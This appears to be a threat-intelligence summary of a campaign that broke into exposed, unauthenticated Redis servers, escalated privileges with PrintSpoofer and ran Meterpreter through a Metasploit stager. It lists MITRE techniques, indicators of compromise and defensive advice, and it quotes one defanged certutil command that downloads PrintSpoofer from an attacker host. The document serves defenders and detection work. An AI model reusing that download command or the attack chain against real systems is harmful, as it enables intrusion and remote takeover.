Keypoints
- Externally exposed Redis servers (notably Redis 3.x) with authentication disabled were targeted to gain initial access.
- The attacker placed PrintSpoofer into the Redis installation path to escalate privileges by abusing SeImpersonatePrivilege.
- The PrintSpoofer binary was retrieved using PowerShell invoke-webrequest or certutil-based download commands.
- A small Metasploit Stager using reverse TCP connected to a C2 server to download and execute the Meterpreter payload in memory.
- Meterpreter execution enabled full remote control and potential lateral movement within affected networks.
- Detected IOCs include specific MD5 hashes for meteran.exe and PrintSpoofer variants, the C2 34.124.148[.]215:9070, and download URLs hosted on 35.185.187[.]24.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Threat actors leveraged exposed Redis instances with disabled authentication to gain access. (‘Redis servers open to the public on the Internet with the authentication feature disabled.’)
- [T1059.001] PowerShell – PowerShell invoke-webrequest was used to download PrintSpoofer into the Redis install path. (‘PowerShell’s “invoke-webrequest” command was used for installation, and the tool was downloaded in the installation path for Redis.’)
- [T1218.005] Signed Binary Proxy Execution – CertUtil was used as a signed Windows utility to fetch PrintSpoofer binaries. (‘certutil -urlcache -split -f “hxxp://35.185.187[.]24/PrintSpoofer.exe” psf.exe’)
- [T1068] Exploitation for Privilege Escalation – PrintSpoofer was deployed to abuse SeImpersonatePrivilege and escalate privileges. (‘PrintSpoofer is a tool that abuses SeImpersonatePrivilege to escalate the user’s privileges.’)
- [T1105] Ingress Tool Transfer – A Metasploit Stager retrieved the Meterpreter payload from a remote C2 server. (‘When Stager is executed, it connects to the C&C server to download the Meterpreter backdoor.’)
- [T1055] Process Injection – Meterpreter was executed in memory to avoid disk-based detection and provide remote control. (‘Meterpreter is executed in the memory, allowing the threat actor to take control over the infected system.’)
- [T1053] Scheduled Task/Job – One documented infection method for Redis-based malware is registering a malware-executing command as a scheduled task (cron). (‘One of the two main ones is registering the malware-executing command as a Cron task’)
Indicators of Compromise
- [MD5 hashes] Malware samples – cff64cc3e82aebd7a7e81f1633b5040e (meteran.exe), dbdcbacbc74b139d914747690ebe0e1c (PrintSpoofer.exe), and one more hash.
- [C2 IP] Command-and-control server – 34.124.148[.]215:9070 (used by the Meterpreter/Stager connection).
- [Download URLs] Remote hosting for payloads – hxxp://35.185.187[.]24/PrintSpoofer.exe, hxxp://35.185.187[.]24/meteran.exe, and one additional URL (ps.exe).
- [File names] Deployed binaries and stagers – PrintSpoofer.exe, ps.exe, meteran.exe (Stager/Meterpreter files observed in the Redis install path).
The attacker targeted exposed Redis 3.x instances (Windows) that lacked authentication to write and execute binaries within the Redis installation path. Initial delivery used either PowerShell invoke-webrequest or certutil to fetch PrintSpoofer (a SeImpersonatePrivilege exploitation tool) into the Redis directory; a sample download command observed was certutil -urlcache -split -f “hxxp://35.185.187[.]24/PrintSpoofer.exe” psf.exe. PrintSpoofer facilitated privilege escalation so subsequent payloads could run with higher rights.
After elevating privileges, the actor deployed a small Metasploit Stager built for reverse TCP. When executed, this Stager connected to the attacker-controlled C2 to download meteran.exe (the Meterpreter payload) and execute it in memory, enabling remote interactive control and potential lateral movement within the network. The chain therefore combined exploitation of a public-facing Redis service, signed-binary download techniques, local privilege escalation, ingress tool transfer, and in-memory backdoor execution.
Defensive focus should be on patching or removing publicly exposed Redis instances, enforcing authentication and network restrictions, monitoring for signed-binary usage like certutil, and hunting for the listed hashes, filenames, and C2 connections (34.124.148[.]215:9070 and downloads from 35.185.187[.]24).
Read more: https://asec.ahnlab.com/en/64034/